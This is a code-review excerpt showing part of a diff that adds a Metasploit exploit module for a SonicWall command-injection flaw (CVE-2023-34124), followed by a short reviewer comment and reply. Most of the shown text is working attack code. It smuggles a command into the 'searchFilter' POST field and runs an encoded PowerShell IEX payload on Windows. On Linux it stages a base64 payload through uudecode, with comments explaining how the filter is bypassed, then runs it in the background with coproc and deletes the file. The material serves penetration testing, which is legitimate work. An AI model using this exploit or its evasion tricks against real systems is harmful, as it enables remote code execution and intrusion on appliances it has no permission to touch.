modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb

```diff
@@ -0,0 +1,380 @@
+    cmd = "cmd.exe /c #{Msf::Post::Windows.escape_powershell_literal(cmd).gsub(/&/, '"&"')}"
+    cmd = "powershell IEX ([System.Text.Encoding]::UTF8.GetString([byte[]]@(#{cmd.bytes.join(',')})))"
+
+    # Run the command
+    vprint_status("Running shell command: #{cmd}")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'num' => '3232150',
+        'action' => 'file_system',
+        'task' => 'search',
+        'item' => 'application_log',
+        'criteria' => '*',
+        'width' => '500',
+        'searchFolder' => 'C:\\GMSVP\\etc\\',
+        'searchFilter' => "appliance.jar|#{cmd}| echo "
+      }
+    })
+
+    # This doesn't work, because our payload blocks and it eventually fails
+    fail_with(Failure::Unreachable, 'No response to command execution') if res.nil? || res.body.nil?
+    fail_with(Failure::UnexpectedReply, 'The server rejected our command due to filtering (the service has very aggressive XSS filtering, which blocks a lot of shell commands)') if res&.body&.include?('invalid contents found')
+
+    print_good('Payload sent!')
+  end
+
+  def execute_command_linux(cmd)
+    vprint_status('Encoding (Linux) payload')
+
+    # Generate a filename
+    payload_file = File.join(datastore['WritableDir'], ".#{Rex::Text.rand_text_alpha_lower(8)}")
+
+    # Wrap the command so we can execute arbitrary commands. There are several
+    # difficulties here, the first of which is that we don't have much in the
+    # way of tools. We're missing curl, wget, base64, python, ruby, even perl!
+    # The best tool I could find for staging a payload is uudecode, so we use
+    # that. (I noticed later that telnet exists, which could be another option)
+    #
+    # The good news is, with uudecode, we can send a base64 payload. The bad
+    # news is, we can't use '+', which means we can't use pure base64! To work
+    # around that, we replace '+' with '@', then use a bit of Bash magic to
+    # put it back! We also can't use quotes, so we have to do a mountain of
+    # escaping instead. The default shell is also /bin/sh, so we need to run
+    # bash explicitly for the `$()` substitutions to work.
+    #
+    # The summary is:
+    # * Use bash so we have access to $() (we can't use backticks)
+    # * Use uudecode to get a + into the $PLUS variable (using base64)
+    # * Generate a base64 payload, but replace + with ${PLUS} to bypass filter
+    # * Decode the payload into our payload file
+    # * Run the payload in the background with coproc
+    # * Delete the payload file
+    cmd = "bash -c #{Shellwords.escape("PLUS=$(echo -e begin-base64\ 755\ a\\\\nKwee\\\\n==== | uudecode -o-);echo -e begin-base64 755 #{Shellwords.escape(payload_file)}\\\\n#{Base64.strict_encode64(cmd).gsub(/\+/, '${PLUS}')}\\\\n==== | uudecode ; coproc #{Shellwords.escape(payload_file)} ; rm #{payload_file}")}"
```

Comment:
I think it would be a tad more readable to split this command into several lines.

Reply:
Sure!